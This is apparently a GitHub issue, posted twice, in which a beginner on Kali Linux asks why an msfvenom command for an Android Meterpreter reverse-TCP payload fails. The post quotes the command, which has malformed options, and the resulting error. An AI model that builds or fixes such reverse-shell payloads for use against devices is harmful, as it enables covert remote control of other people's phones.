You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
hello i am new to this whole thing and was trying to create a payload i am following this tutorial https://www.youtube.com/watch?v=rY07SB7Y9mw but instead of the windows reverse tcp metaterpreter framework i was using the android this is the code i used: msfvenom -p android/meterpreter_reverse_tcp LOCALHOST=my ip was here LPORT=443 -f exe > outl.exe but when i executed it i got [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 80454 bytes
Error: The payload could not be generated, check options
and it didn't create the payload so i am new to this thing and would love some help. i am on kali linux
The text was updated successfully, but these errors were encountered:
hello i am new to this whole thing and was trying to create a payload i am following this tutorial https://www.youtube.com/watch?v=rY07SB7Y9mw but instead of the windows reverse tcp metaterpreter framework i was using the android this is the code i used: msfvenom -p android/meterpreter_reverse_tcp LOCALHOST=my ip was here LPORT=443 -f exe > outl.exe but when i executed it i got [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 80454 bytes
Error: The payload could not be generated, check options
and it didn't create the payload so i am new to this thing and would love some help. i am on kali linux
The text was updated successfully, but these errors were encountered: